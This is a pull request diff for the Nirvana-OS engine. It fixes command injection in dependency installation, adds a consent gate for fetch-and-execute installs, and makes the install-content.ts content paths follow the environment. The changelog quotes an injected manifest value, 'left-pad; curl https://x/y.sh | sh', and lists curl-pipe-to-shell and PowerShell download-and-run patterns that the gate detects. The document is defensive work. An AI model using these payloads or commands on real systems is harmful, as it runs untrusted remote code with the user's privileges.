### PR TITLE
fix: run dependency data as argv, gate fetch-and-execute, scope the overlay

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -8,6 +8,118 @@ All notable changes to the Nirvana-OS engine. Versions map to GitHub releases
 
 ## Unreleased
 
+### A field that reads as data stops being able to run a command
+
+`dependencies.yaml` carries two kinds of field, and the activator ran both as a
+shell line. `system[].install.<platform>` is a shell line by design: the squad
+author writes `brew install ffmpeg` there, and sudo or a download over 1 GB
+stops at the consent gate first. `node:`, `python:`, `models[]` and the two
+`repo` fields are data. Package tokens, a repo, a url, a filename, a path. They were joined
+into a shell string too, so a manifest carrying
+`- "left-pad; curl https://x/y.sh | sh"`, or a model url with a `;` in it, ran a
+second command during `nrv activate`, with the user's own privileges and no gate
+in front of it. Wrapping the pip tokens in single quotes only moved the door,
+since an apostrophe inside a token closes them.
+
+`services[].repo` and `custom_nodes[].repo` were the last two, interpolated into
+a `git clone` line. Every one of these paths now spawns an argv array with no
+shell, so on macOS and Linux a token can only ever be one argument. `models[]`
+gains the quieter half of the same fix: an install path with a space in it used
+to split into two arguments. `install_cmd`, `start_cmd`, `health_check` and
+`post_install[]` are untouched — those are command by design, written by the
+squad author, and they stay shell lines.
+
+Windows needs one more step, and leaving it to the runtime is what made it
+dangerous. `pip`, `uv`, `curl` and `huggingface-cli` are real executables there,
+so those paths spawn directly, with no shell anywhere. `npm`, `pnpm` and `yarn`
+ship as `.cmd` shims that no runtime starts without a shell, and the runtime
+does not quote the token: libuv quotes an argument only when it holds a space,
+tab or double quote (`quote_cmd_arg`, `src/win/process.c`). So the command line
+is built by the activator now, with every argument quoted, and handed to the
+shell path as `cmd.exe /d /s /c "<line>"`, where `/s` strips the outer pair the
+runtime adds and leaves ours standing. `^`, `&`, `|`, `<`, `>`, `(` and `)` are
+data inside it. Four characters survive no quoting cmd.exe understands and are
+refused by name instead: `"`, `%`, `!` and a newline. No spec in any shipped
+pack carries one.
+
+That last part matters because of what the audit found. `@remotion/cli@^4.0.0`
+ships today in `creative-studio` and `genesis-circle`, it has no space, tab or
+double quote, and cmd.exe eats `^` as its own escape character: on Windows it
+was being installed as `@remotion/cli@4.0.0`. A different range, no error,
+nobody told. That is a correctness bug that lived alongside the security one,
+and quoting closes both. `system[].install` is untouched, and `--dry-run` now
+reports the `argv` it would spawn next to the display string.
+
+### Installing by fetching and executing now stops at the consent gate
+
+This one changes what you see when you run `nrv activate`, so it is worth
+reading before you update.
+
+`system[].install.<platform>` is a shell line by design, and the consent gate in
+front of it matched exactly one thing: `sudo`. Everything else ran. So
+`curl -fsSL https://bun.sh/install | bash`, which ships today in `brandcraft`
+and `grok-studio-nirvana`, executed a third party's script on the buyer's
+machine without asking anything, because someone said "install the
+dependencies". The exit-code contract already promised `2` for heavy installs;
+this fills a promise instead of inventing one.
+
+The gate now also stops a command that downloads something and runs it, in
+either of its two shapes. The direct one is a pipe or a substitution:
+`curl … | bash`, `| sh`, `| zsh` (with flags, redirections, or a `sudo -E` in
+between), `wget -qO- … | sh`, `bash <(curl …)`, `sh -c "$(curl …)"`,
+`eval "$(curl …)"`, and on PowerShell `iwr … | iex`, `irm … | iex`,
+`Invoke-WebRequest … | Invoke-Expression`. The two-step one is the commoner
+shape in the wild and has no pipe anywhere: fetch a remote url and, in the same
+command, run an interpreter or a downloaded path — `curl … -o /tmp/x.zip &&
+unzip … && sh /tmp/x/install`. `ebook-maestro-nirvana` ships exactly that today
+in `genesis-circle` and `publishing-knowledge`, to install veraPDF.
+
+The item comes back as `confirmation_required` with exit `2`, and the message
+names the exact command, the url it fetches, the interpreter that would run it,
+and **which of the two signals fired**. That distinction is deliberate: a pipe
+into a shell is not arguable, while a fetch and a runner in one command is a
+strong reading of it. The second says so, and asks you to read the command
+before accepting. `--confirm-heavy` is the same gesture that already accepted
+sudo and large downloads; nothing new to learn.
+
+Measured against every `system[].install` declaration in the packs (590 across
+340 manifests): 75 stop for a direct form, 5 for the two-step form (one distinct
+command, veraPDF), 145 keep stopping for sudo exactly as before, and 365 pass
+untouched.
+
+Downloading is not executing, and the difference is the point. `curl -o
+model.bin <url>`, `curl … | tar -xz`, `brew install`, `apt-get install`,
+`winget install` and `git clone` do not stop for anything. A gate that fires on
+ordinary installs is a gate everyone learns to pass without reading.
+
+### The paid overlay lands where the engine lives
+
+`install-content.ts` resolved `~/squads`, `~/businesses`,
+`~/businesses/_library/dna` and `~/.nirvana/packs` from `os.homedir()`, once, at
+module scope, while `installer.ts` honours `NIRVANA_HOME`, `SQUADS_DIR`,
+`BUSINESSES_DIR` and `DNA_LIBRARY`. Anyone whose Nirvana home is not the default
+got the engine in one place and the paid content in another. It also made the
+overlay untestable by environment: `os.homedir()` follows `$HOME` on macOS and
+Linux and `%USERPROFILE%` on Windows, which is why a test that redirected only
+`HOME` passed on two runners and wrote into the real profile on the third. The
+four roots are lazy now, and read the same variables `installer.ts` reads.
+
+### `nrv run-track list` prints the id that `close` takes
+
+The listing showed `project_id`, which is a directory basename. `beat` and
+`close` require the `run_id`, so the one command that discovers open runs handed
+over an identifier the two commands that act on them answer `not found` to, and
+the id had to be read out of the SQLite file by hand. Both are labelled columns
+now, because they are different things.
+
+### The READMEs catch up with the engine
+
+All six said "currently 0.8.1" while the engine was on 0.10.0, and none of them
+mentioned the two headline commands of that release. The status line reads
+0.10.0, and the command table gained a row for `nrv validate`, the admission
+gate for a squad, a business or a mind-clone, and one for `nrv migrate`, the
+conversion to Squad Protocol 6.0.
+
 ## 0.10.0 — 2026-08-27
 
 ### A project stops seeing other projects' runs

--- a/CHANGELOG.pt-BR.md
+++ b/CHANGELOG.pt-BR.md
@@ -8,6 +8,120 @@ do engine que o `npx @nirvana-os/cli` e as instalações de pack consomem.
 
 ## Não lançado
 
+### Um campo que se lê como dado deixa de poder rodar um comando
+
+O `dependencies.yaml` tem dois tipos de campo, e o activator rodava os dois como
+linha de shell. O `system[].install.<plataforma>` é linha de shell por desenho: o
+autor do squad escreve `brew install ffmpeg` ali, e sudo ou download acima de
+1 GB para antes, no portão de consentimento. Já `node:`, `python:`, `models[]` e os dois
+campos `repo` são dado. Tokens de pacote, um repo, uma url, um nome de arquivo,
+um caminho. Também eram juntados numa string de shell, então um manifesto com
+`- "left-pad; curl https://x/y.sh | sh"`, ou uma url de modelo com `;` no meio,
+executava um segundo comando durante o `nrv activate`, com os privilégios do
+próprio usuário e nenhum portão na frente. Envolver os tokens do pip em aspas
+simples só mudava a porta de lugar, porque um apóstrofo dentro do token as fecha.
+
+O `services[].repo` e o `custom_nodes[].repo` eram os dois últimos, interpolados
+numa linha de `git clone`. Todos esses caminhos agora executam um array de argv
+sem shell, e no macOS e no Linux um token só pode ser um argumento. O `models[]`
+ganha de quebra a metade silenciosa da mesma correção: um caminho de instalação
+com espaço se partia em dois argumentos. O `install_cmd`, o `start_cmd`, o
+`health_check` e o `post_install[]` continuam intactos — esses são comando por
+desenho, escritos pelo autor do squad, e seguem como linha de shell.
+
+O Windows exige um passo a mais, e deixá-lo por conta do runtime é o que tornava
+isso perigoso. `pip`, `uv`, `curl` e `huggingface-cli` são executáveis de verdade
+lá, então esses caminhos iniciam direto, sem shell nenhum. Já `npm`, `pnpm` e
+`yarn` vêm como shims `.cmd`, que runtime nenhum inicia sem shell, e o runtime
+não cita o token: o libuv só cita um argumento que contenha espaço, tab ou aspas
+duplas (`quote_cmd_arg`, `src/win/process.c`). Então a linha de comando passa a
+ser montada pelo activator, com cada argumento entre aspas, e entregue ao
+caminho de shell como `cmd.exe /d /s /c "<linha>"`, em que o `/s` retira o par
+externo que o runtime acrescenta e deixa o nosso de pé. `^`, `&`, `|`, `<`, `>`,
+`(` e `)` são dado ali dentro. Quatro caracteres não sobrevivem a citação
+nenhuma que o cmd.exe entenda e são recusados com nome: `"`, `%`, `!` e a quebra
+de linha. Nenhum spec dos packs publicados carrega um deles.
+
+Essa última parte importa por causa do que a auditoria encontrou. O
+`@remotion/cli@^4.0.0` viaja hoje no `creative-studio` e no `genesis-circle`, não
+tem espaço, tab nem aspas duplas, e o cmd.exe come o `^` como o próprio
+caractere de escape: no Windows ele estava sendo instalado como
+`@remotion/cli@4.0.0`. Outro range, sem erro, sem avisar ninguém. É um bug de
+correção que morava ao lado do de segurança, e a citação fecha os dois. O
+`system[].install` continua como estava, e o `--dry-run` passa a reportar o
+`argv` que iniciaria, ao lado da string de exibição.
+
+### Instalar buscando-e-executando passa a parar no portão de consentimento
+
+Esta muda o que você vê ao rodar `nrv activate`, então vale ler antes de
+atualizar.
+
+O `system[].install.<plataforma>` é linha de shell por desenho, e o portão de
+consentimento na frente dele casava exatamente uma coisa: `sudo`. Todo o resto
+rodava. Então `curl -fsSL https://bun.sh/install | bash`, que viaja hoje no
+`brandcraft` e no `grok-studio-nirvana`, executava o script de um terceiro na
+máquina do comprador sem perguntar nada, porque alguém disse "instale as
+dependências". O contrato de saída já prometia `2` para instalação pesada; isto
+cumpre uma promessa em vez de inventar outra.
+
+O portão agora também para um comando que baixa algo e executa, nas duas formas
+que isso tem. A direta é pipe ou substituição: `curl … | bash`, `| sh`, `| zsh`
+(com flags, redirecionamentos ou um `sudo -E` no meio), `wget -qO- … | sh`,
+`bash <(curl …)`, `sh -c "$(curl …)"`, `eval "$(curl …)"` e, no PowerShell,
+`iwr … | iex`, `irm … | iex`, `Invoke-WebRequest … | Invoke-Expression`. A de
+dois tempos é a mais comum no mundo real e não tem pipe nenhum: busca uma url
+remota e, no mesmo comando, roda um interpretador ou um caminho baixado —
+`curl … -o /tmp/x.zip && unzip … && sh /tmp/x/install`. O
+`ebook-maestro-nirvana` viaja hoje com exatamente isso no `genesis-circle` e no
+`publishing-knowledge`, para instalar o veraPDF.
+
+O item volta como `confirmation_required` com saída `2`, e a mensagem nomeia o
+comando exato, a url que será buscada, o interpretador que a executaria e
+**qual dos dois sinais disparou**. A distinção é de propósito: um pipe para
+dentro de um shell não é discutível, enquanto uma busca e um executor no mesmo
+comando são uma leitura forte dele. A segunda diz isso, e pede que você leia o
+comando antes de aceitar. O `--confirm-heavy` é o mesmo gesto que já aceitava
+sudo e download grande; não há nada novo para aprender.
+
+Medido contra todas as declarações `system[].install` dos packs (590 em 340
+manifestos): 75 param por forma direta, 5 pela de dois tempos (um comando
+distinto, o veraPDF), 145 continuam parando por sudo exatamente como antes, e
+365 passam intocadas.
+
+Baixar não é executar, e a diferença é o ponto. `curl -o modelo.bin <url>`,
+`curl … | tar -xz`, `brew install`, `apt-get install`, `winget install` e
+`git clone` não param para nada. Um portão que dispara em instalação comum é um
+portão que todo mundo aprende a passar sem ler.
+
+### O conteúdo pago cai onde o engine mora
+
+O `install-content.ts` resolvia `~/squads`, `~/businesses`,
+`~/businesses/_library/dna` e `~/.nirvana/packs` a partir de `os.homedir()`, uma
+vez, no escopo do módulo, enquanto o `installer.ts` honra `NIRVANA_HOME`,
+`SQUADS_DIR`, `BUSINESSES_DIR` e `DNA_LIBRARY`. Quem tem um home do Nirvana fora
+do padrão recebia o engine num lugar e o conteúdo pago em outro. Isso também
+tornava o overlay intestável por ambiente: `os.homedir()` segue `$HOME` no macOS
+e no Linux e `%USERPROFILE%` no Windows, e foi por isso que um teste que
+redirecionava só o `HOME` passava em dois runners e escrevia no perfil real no
+terceiro. As quatro raízes agora são preguiçosas e leem as mesmas variáveis que o
+`installer.ts` lê.
+
+### O `nrv run-track list` imprime o id que o `close` aceita
+
+A listagem mostrava o `project_id`, que é o nome do diretório. O `beat` e o
+`close` exigem o `run_id`, então o único comando que descobre runs abertos
+entregava um identificador ao qual os dois comandos que agem sobre eles
+respondem `not found`, e o id tinha que ser lido do SQLite na mão. Agora os dois
+são colunas rotuladas, porque são coisas diferentes.
+
+### Os READMEs alcançam o engine
+
+Os seis diziam "atualmente 0.8.1" com o engine em 0.10.0, e nenhum mencionava os
+dois comandos de manchete daquela release. A linha de status passa a dizer
+0.10.0, e a tabela de comandos ganhou uma linha para o `nrv validate`, o portão
+de admissão de squad, empresa e mind-clone, e outra para o `nrv migrate`, a
+conversão para o Squad Protocol 6.0.
+
 ## 0.10.0 — 2026-08-27
 
 ### Um projeto para de enxergar os runs dos outros

--- a/README.ar.md
+++ b/README.ar.md
@@ -151,6 +151,8 @@ and a competitive teardown.
 | `nrv dispatch --business <slug> \| --squad <slug> \| --agent-x "<brief>" --exec` | تشغيل موجز على هدف تسمّيه أنت؛ لا يُستشار الموجّه أبداً |
 | `nrv run <business> "<brief>" --execution-mode=gauntlet --gauntlet-intensity=light\|balanced\|exhaustive` | الانضمام إلى Gauntlet: مرشحون وتقييمات وجولات مراجعة بثلاث شدّات (أهداف Business تحتاج `NIRVANA_BUSINESS_GAUNTLET_ALLOWLIST`) |
 | `nrv multi-target plan\|run\|status <plan.json>` | تجميع خطة متعددة الأهداف أو تنفيذها أو فحصها فوق Run Kernel (`NIRVANA_MULTI_TARGET_KILL_SWITCH=1` يعطّل `run`) |
+| `nrv validate <squad\|business\|clone> <slug> [--fix]` | بوابة قبول لكيان واحد، أو `--all` لكل الكيانات المثبّتة؛ و`--fix` يصلح ما يمكن إصلاحه دون اختلاق شيء |
+| `nrv migrate <slug> --to 6 [--apply]` | يحوّل squad إلى Squad Protocol 6.0؛ التشغيل التجريبي هو الافتراضي، و`--apply` يكتب مع نسخة احتياطية |
 | `nrv update <pack>` | تحديث حزمة مثبّتة |
 | `nrv doctor` | فحص التثبيت؛ على Windows، ينظّف `nrv install --repair-path` مدخلات PATH الخاصة بالمستخدم التي يحذّر منها |
 
@@ -174,4 +176,4 @@ and a competitive teardown.
 
 الترخيص: Nirvana-OS Sustainable Use License (SUL) v1.0. المصدر منشور ومقروء علناً، والمحرك مجاني الاستخدام. إنه متاح المصدر، لا ترخيص مفتوح المصدر معتمداً من OSI، وبعض الاستخدامات التجارية تتطلب ترخيصاً تجارياً منفصلاً. اقرأ [LICENSE](./LICENSE) قبل الاعتماد على أي ملخص، بما في ذلك هذا.
 
-الحالة: بيتا (0.x، حالياً 0.8.1). المحرك يعمل اليوم ويُثبَّت في دقائق. توقّع أن تستمر الواجهة في التغيّر حتى الإصدار 1.0.
+الحالة: بيتا (0.x، حالياً 0.10.0). المحرك يعمل اليوم ويُثبَّت في دقائق. توقّع أن تستمر الواجهة في التغيّر حتى الإصدار 1.0.

--- a/README.es.md
+++ b/README.es.md
@@ -151,6 +151,8 @@ La capa de pago es **contenido, no capacidad**: colecciones curadas y listas par
 | `nrv dispatch --business <slug> \| --squad <slug> \| --agent-x "<brief>" --exec` | Ejecuta un brief contra un objetivo que tú nombras; el router nunca se consulta |
 | `nrv run <business> "<brief>" --execution-mode=gauntlet --gauntlet-intensity=light\|balanced\|exhaustive` | Opta por el Gauntlet: candidatos, evaluaciones y rondas de revisión en tres intensidades (los objetivos Business necesitan `NIRVANA_BUSINESS_GAUNTLET_ALLOWLIST`) |
 | `nrv multi-target plan\|run\|status <plan.json>` | Compila, ejecuta o inspecciona un plan multi-target sobre el Run Kernel (`NIRVANA_MULTI_TARGET_KILL_SWITCH=1` desactiva `run`) |
+| `nrv validate <squad\|business\|clone> <slug> [--fix]` | Puerta de admisión de una entidad, o `--all` para todas las instaladas; `--fix` repara lo que se puede reparar sin inventar nada |
+| `nrv migrate <slug> --to 6 [--apply]` | Convierte un squad al Squad Protocol 6.0; dry run por defecto, `--apply` escribe con copia de seguridad |
 | `nrv update <pack>` | Actualiza un pack instalado |
 | `nrv doctor` | Revisa la instalación; en Windows, `nrv install --repair-path` limpia las entradas del PATH del usuario sobre las que avisa |
 
@@ -174,4 +176,4 @@ Autor: **Luiz Gustavo Vieira Rodrigues (gutomec / Prospecteezy)**. Sin coautores
 
 Licencia: la Nirvana-OS Sustainable Use License (SUL) v1.0. El código fuente está publicado y es abiertamente legible, y el motor es gratis para usar. Es source-available, no una licencia open-source aprobada por la OSI, y ciertos usos comerciales requieren una licencia comercial aparte. Lee [LICENSE](./LICENSE) antes de confiar en cualquier resumen, incluido este.
 
-Estado: beta (0.x, actualmente 0.8.1). El motor funciona hoy y se instala en minutos. Espera que la superficie siga moviéndose hasta la 1.0.
+Estado: beta (0.x, actualmente 0.10.0). El motor funciona hoy y se instala en minutos. Espera que la superficie siga moviéndose hasta la 1.0.

--- a/README.hi.md
+++ b/README.hi.md
@@ -151,6 +151,8 @@ and a competitive teardown.
 | `nrv dispatch --business <slug> \| --squad <slug> \| --agent-x "<brief>" --exec` | आपके नामित लक्ष्य के विरुद्ध एक ब्रीफ़ चलाता है; राउटर से कभी नहीं पूछा जाता |
 | `nrv run <business> "<brief>" --execution-mode=gauntlet --gauntlet-intensity=light\|balanced\|exhaustive` | Gauntlet में opt-in करता है: तीन तीव्रताओं में उम्मीदवार, मूल्यांकन और संशोधन दौर (Business लक्ष्यों को `NIRVANA_BUSINESS_GAUNTLET_ALLOWLIST` चाहिए) |
 | `nrv multi-target plan\|run\|status <plan.json>` | Run Kernel के ऊपर एक multi-target प्लान को कंपाइल, निष्पादित या निरीक्षण करता है (`NIRVANA_MULTI_TARGET_KILL_SWITCH=1` `run` को बंद करता है) |
+| `nrv validate <squad\|business\|clone> <slug> [--fix]` | एक एंटिटी का प्रवेश द्वार, या `--all` से हर इंस्टॉल की हुई एंटिटी; `--fix` जो ठीक हो सकता है उसे ठीक करता है, कुछ गढ़ता नहीं |
+| `nrv migrate <slug> --to 6 [--apply]` | एक squad को Squad Protocol 6.0 में बदलता है; डिफ़ॉल्ट dry run है, `--apply` बैकअप के साथ लिखता है |
 | `nrv update <pack>` | एक इंस्टॉल किया हुआ pack अपडेट करता है |
 | `nrv doctor` | इंस्टॉलेशन जाँचता है; Windows पर, `nrv install --repair-path` उन यूज़र PATH एंट्रीज़ को साफ़ करता है जिनके बारे में यह चेतावनी देता है |
 
@@ -174,4 +176,4 @@ and a competitive teardown.
 
 लाइसेंस: Nirvana-OS Sustainable Use License (SUL) v1.0। स्रोत प्रकाशित और खुले तौर पर पठनीय है, और इंजन उपयोग के लिए मुफ़्त है। यह source-available है, OSI-अनुमोदित ओपन-सोर्स लाइसेंस नहीं, और कुछ व्यावसायिक उपयोगों के लिए अलग व्यावसायिक लाइसेंस चाहिए। किसी भी सारांश पर, इस पर भी, भरोसा करने से पहले [LICENSE](./LICENSE) पढ़ें।
 
-स्थिति: beta (0.x, अभी 0.8.1)। इंजन आज काम करता है और मिनटों में इंस्टॉल होता है। 1.0 तक सतह के बदलते रहने की उम्मीद रखें।
+स्थिति: beta (0.x, अभी 0.10.0)। इंजन आज काम करता है और मिनटों में इंस्टॉल होता है। 1.0 तक सतह के बदलते रहने की उम्मीद रखें।

--- a/README.md
+++ b/README.md
@@ -151,6 +151,8 @@ The paid layer is **content, not capability**: curated, ready-to-run collections
 | `nrv dispatch --business <slug> \| --squad <slug> \| --agent-x "<brief>" --exec` | Run a brief against a target you name; the router is never consulted |
 | `nrv run <business> "<brief>" --execution-mode=gauntlet --gauntlet-intensity=light\|balanced\|exhaustive` | Opt into the Gauntlet: candidates, evaluations, and revision rounds at three intensities (Business targets need `NIRVANA_BUSINESS_GAUNTLET_ALLOWLIST`) |
 | `nrv multi-target plan\|run\|status <plan.json>` | Compile, execute, or inspect a multi-target plan over the Run Kernel (`NIRVANA_MULTI_TARGET_KILL_SWITCH=1` turns `run` off) |
+| `nrv validate <squad\|business\|clone> <slug> [--fix]` | Admission gate for one entity, or `--all` for every installed one; `--fix` repairs what can be repaired without inventing anything |
+| `nrv migrate <slug> --to 6 [--apply]` | Convert a squad to Squad Protocol 6.0; dry run by default, `--apply` writes with a backup |
 | `nrv update <pack>` | Update an installed pack |
 | `nrv doctor` | Check the installation; on Windows, `nrv install --repair-path` cleans the user PATH entries it warns about |
 
@@ -174,4 +176,4 @@ Author: **Luiz Gustavo Vieira Rodrigues (gutomec / Prospecteezy)**. No co-author
 
 License: the Nirvana-OS Sustainable Use License (SUL) v1.0. The source is published and openly readable, and the engine is free to use. It is source-available, not an OSI-approved open-source license, and certain commercial uses require a separate commercial license. Read [LICENSE](./LICENSE) before relying on any summary, including this one.
 
-Status: beta (0.x, currently 0.8.1). The engine works today and installs in minutes. Expect the surface to keep moving until 1.0.
+Status: beta (0.x, currently 0.10.0). The engine works today and installs in minutes. Expect the surface to keep moving until 1.0.

--- a/README.pt-BR.md
+++ b/README.pt-BR.md
@@ -151,6 +151,8 @@ A camada paga é **conteúdo, não capacidade**: coleções curadas e prontas pa
 | `nrv dispatch --business <slug> \| --squad <slug> \| --agent-x "<brief>" --exec` | Roda um briefing contra um alvo que você nomeia; o roteador nunca é consultado |
 | `nrv run <business> "<brief>" --execution-mode=gauntlet --gauntlet-intensity=light\|balanced\|exhaustive` | Opta pelo Gauntlet: candidates, avaliações e rodadas de revisão em três intensidades (alvos Business exigem `NIRVANA_BUSINESS_GAUNTLET_ALLOWLIST`) |
 | `nrv multi-target plan\|run\|status <plan.json>` | Compila, executa ou inspeciona um plano multi-target sobre o Run Kernel (`NIRVANA_MULTI_TARGET_KILL_SWITCH=1` desliga o `run`) |
+| `nrv validate <squad\|business\|clone> <slug> [--fix]` | Portão de admissão de uma entidade, ou `--all` para todas as instaladas; `--fix` conserta o que dá para consertar sem inventar nada |
+| `nrv migrate <slug> --to 6 [--apply]` | Converte um squad para o Squad Protocol 6.0; dry run por padrão, `--apply` escreve com backup |
 | `nrv update <pack>` | Atualiza um pack instalado |
 | `nrv doctor` | Verifica a instalação; no Windows, `nrv install --repair-path` limpa as entradas do PATH do usuário sobre as quais ele avisa |
 
@@ -174,4 +176,4 @@ Autor: **Luiz Gustavo Vieira Rodrigues (gutomec / Prospecteezy)**. Sem coautores
 
 Licença: a Nirvana-OS Sustainable Use License (SUL) v1.0. O código-fonte é publicado e abertamente legível, e o engine é grátis para usar. É source-available, não uma licença open-source aprovada pela OSI, e certos usos comerciais exigem uma licença comercial separada. Leia [LICENSE](./LICENSE) antes de confiar em qualquer resumo, incluindo este.
 
-Status: beta (0.x, atualmente 0.8.1). O engine funciona hoje e instala em minutos. Espere a superfície continuar mudando até o 1.0.
+Status: beta (0.x, atualmente 0.10.0). O engine funciona hoje e instala em minutos. Espere a superfície continuar mudando até o 1.0.

--- a/README.zh.md
+++ b/README.zh.md
@@ -151,6 +151,8 @@ and a competitive teardown.
 | `nrv dispatch --business <slug> \| --squad <slug> \| --agent-x "<brief>" --exec` | 针对你指定的目标运行一份简报；从不咨询路由器 |
 | `nrv run <business> "<brief>" --execution-mode=gauntlet --gauntlet-intensity=light\|balanced\|exhaustive` | 选择进入 Gauntlet：候选、评估和修订轮次，分三档强度（Business 目标需要 `NIRVANA_BUSINESS_GAUNTLET_ALLOWLIST`） |
 | `nrv multi-target plan\|run\|status <plan.json>` | 在 Run Kernel 之上编译、执行或检视一份多目标计划（`NIRVANA_MULTI_TARGET_KILL_SWITCH=1` 关闭 `run`） |
+| `nrv validate <squad\|business\|clone> <slug> [--fix]` | 单个实体的准入门；`--all` 检查已安装的全部，`--fix` 修好能修的部分，不凭空编造 |
+| `nrv migrate <slug> --to 6 [--apply]` | 把一个 squad 转换到 Squad Protocol 6.0；默认只做 dry run，`--apply` 才写入并留下备份 |
 | `nrv update <pack>` | 更新一个已安装的 pack |
 | `nrv doctor` | 检查安装；在 Windows 上，`nrv install --repair-path` 会清理它警告过的用户 PATH 条目 |
 
@@ -174,4 +176,4 @@ and a competitive teardown.
 
 许可：Nirvana-OS Sustainable Use License (SUL) v1.0。源码公开发布、可公开阅读，引擎可免费使用。它是 source-available，而非 OSI 批准的开源许可，某些商业用途需要单独的商业许可。在依赖任何摘要（包括这一段）之前，请先阅读 [LICENSE](./LICENSE)。
 
-状态：beta（0.x，当前为 0.8.1）。引擎今天就能用，几分钟内即可安装。在 1.0 之前，预计接口表面会持续变动。
+状态：beta（0.x，当前为 0.10.0）。引擎今天就能用，几分钟内即可安装。在 1.0 之前，预计接口表面会持续变动。

--- a/skills/_shared/scripts/install-content.ts
+++ b/skills/_shared/scripts/install-content.ts
@@ -31,11 +31,18 @@ function auditEmit(event: string, payload: Record<string, unknown>): void {
   } catch { /* audit unavailable (partial install) — installing still wins */ }
 }
 
-const HOME = homedir();
-const SQUADS_DIR = join(HOME, "squads");
-const BUSINESSES_DIR = join(HOME, "businesses");
-const DNA_DIR = join(BUSINESSES_DIR, "_library/dna");
-const PACKS_DIR = join(HOME, ".nirvana", "packs");
+// Lazy, env-aware roots — the same resolution `installer.ts` and `paths.js` use.
+// These used to be `homedir()` joins fixed at module scope, so a machine with
+// NIRVANA_HOME or SQUADS_DIR set got the engine in one place and the paid
+// content in another. It also made the overlay untestable by environment:
+// `os.homedir()` follows `$HOME` on macOS and Linux but `%USERPROFILE%` on
+// Windows, which is why a test that redirected only `HOME` passed on two
+// platforms and wrote into the real profile on the third (PR #133).
+function nirvanaHome(): string { return process.env.NIRVANA_HOME ?? homedir(); }
+function squadsDir(): string { return process.env.SQUADS_DIR ?? join(nirvanaHome(), "squads"); }
+function businessesDir(): string { return process.env.BUSINESSES_DIR ?? join(nirvanaHome(), "businesses"); }
+function dnaDir(): string { return process.env.DNA_LIBRARY ?? join(businessesDir(), "_library", "dna"); }
+function packsDir(): string { return join(nirvanaHome(), ".nirvana", "packs"); }
 
 const argv = process.argv.slice(2);
 const DRY = argv.includes("--dry");
@@ -79,7 +86,7 @@ function requiresEngine(): string | null {
 }
 function engineVersion(): string | null {
   // This script lives at <skills>/_shared/scripts/; the engine VERSION at <skills>/VERSION.
-  for (const p of [join(import.meta.dir, "..", "..", "VERSION"), join(HOME, ".nirvana", "skills", "VERSION")]) {
+  for (const p of [join(import.meta.dir, "..", "..", "VERSION"), join(homedir(), ".nirvana", "skills", "VERSION")]) {
     try { const v = readFileSync(p, "utf8").trim(); if (v) return v; } catch { /* next */ }
   }
   return null;
@@ -157,7 +164,7 @@ function recordInstall(m: Manifest): void {
     const items = ([["squad", m.squads], ["business", m.businesses], ["mind-clone", m["mind-clones"]]] as const)
       .flatMap(([kind, hashes]) => Object.keys(hashes ?? {}).map((slug) => ({
         kind, name: slug, slug,
-        path: join(kind === "squad" ? SQUADS_DIR : kind === "business" ? BUSINESSES_DIR : DNA_DIR, slug),
+        path: join(kind === "squad" ? squadsDir() : kind === "business" ? businessesDir() : dnaDir(), slug),
       })));
     new InstallManifest().append({
       ts: new Date().toISOString(),
@@ -180,7 +187,7 @@ function recordInstall(m: Manifest): void {
   }
 }
 
-const manifestPath = join(PACKS_DIR, `${SLUG}.json`);
+const manifestPath = join(packsDir(), `${SLUG}.json`);
 const man: Manifest = (() => { try { return JSON.parse(readFileSync(manifestPath, "utf8")); } catch { return {}; } })();
 
 const availableIn = (dir: string, marker: string): string[] =>
@@ -237,9 +244,9 @@ auditEmit("x_install_order_resolved", {
 });
 
 const KIND_SOURCES: Record<string, { src: string; dst: string; marker: string; entity: "squad" | "business" | "mind-clone"; recorded: Record<string, string> }> = {
-  "squads": { src: squadsSrc, dst: SQUADS_DIR, marker: "squad.yaml", entity: "squad", recorded: man.squads ?? {} },
-  "businesses": { src: bizSrc, dst: BUSINESSES_DIR, marker: "business.yaml", entity: "business", recorded: man.businesses ?? {} },
-  "mind-clones": { src: cloneSrc, dst: DNA_DIR, marker: "MANIFEST.yaml", entity: "mind-clone", recorded: man["mind-clones"] ?? {} },
+  "squads": { src: squadsSrc, dst: squadsDir(), marker: "squad.yaml", entity: "squad", recorded: man.squads ?? {} },
+  "businesses": { src: bizSrc, dst: businessesDir(), marker: "business.yaml", entity: "business", recorded: man.businesses ?? {} },
+  "mind-clones": { src: cloneSrc, dst: dnaDir(), marker: "MANIFEST.yaml", entity: "mind-clone", recorded: man["mind-clones"] ?? {} },
 };
 
 // ── The admission gate, per entity, BEFORE anything is mirrored ─────────────
@@ -288,9 +295,9 @@ if (entering.length) {
 }
 
 const kindRuns: Record<string, () => SyncRes> = {
-  "squads": () => syncKind("squads", squadsSrc, SQUADS_DIR, availableIn(squadsSrc, "squad.yaml"), man.squads ?? {}, srcHashes["squads"]),
-  "businesses": () => syncKind("businesses", bizSrc, BUSINESSES_DIR, availableIn(bizSrc, "business.yaml"), man.businesses ?? {}, srcHashes["businesses"]),
-  "mind-clones": () => syncKind("mind-clones", cloneSrc, DNA_DIR, availableIn(cloneSrc, "MANIFEST.yaml"), man["mind-clones"] ?? {}, srcHashes["mind-clones"]),
+  "squads": () => syncKind("squads", squadsSrc, squadsDir(), availableIn(squadsSrc, "squad.yaml"), man.squads ?? {}, srcHashes["squads"]),
+  "businesses": () => syncKind("businesses", bizSrc, businessesDir(), availableIn(bizSrc, "business.yaml"), man.businesses ?? {}, srcHashes["businesses"]),
+  "mind-clones": () => syncKind("mind-clones", cloneSrc, dnaDir(), availableIn(cloneSrc, "MANIFEST.yaml"), man["mind-clones"] ?? {}, srcHashes["mind-clones"]),
 };
 const runs: Record<string, SyncRes> = {};
 for (const kind of kindOrder.order) runs[kind] = kindRuns[kind]();
@@ -305,7 +312,7 @@ const sq = runs["squads"], bz = runs["businesses"], cl = runs["mind-clones"];
   for (const bind of scan.bindings) {
     if (bind.dangling) continue;
     if (scan.availableClones.has(bind.clone)) continue;
-    if (existsSync(join(DNA_DIR, bind.clone))) continue;
+    if (existsSync(join(dnaDir(), bind.clone))) continue;
     const key = `${bind.clone}|${bind.business}/${bind.employee}`;
     if (reported.has(key)) continue;
     reported.add(key);
@@ -337,7 +344,7 @@ if (collisions.length > 0) {
 }
 
 if (!DRY) {
-  mkdirSync(PACKS_DIR, { recursive: true });
+  mkdirSync(packsDir(), { recursive: true });
   const out: Manifest = { slug: SLUG, version: VERSION, updated_at: new Date().toISOString(), squads: sq.hashes, businesses: bz.hashes, "mind-clones": cl.hashes };
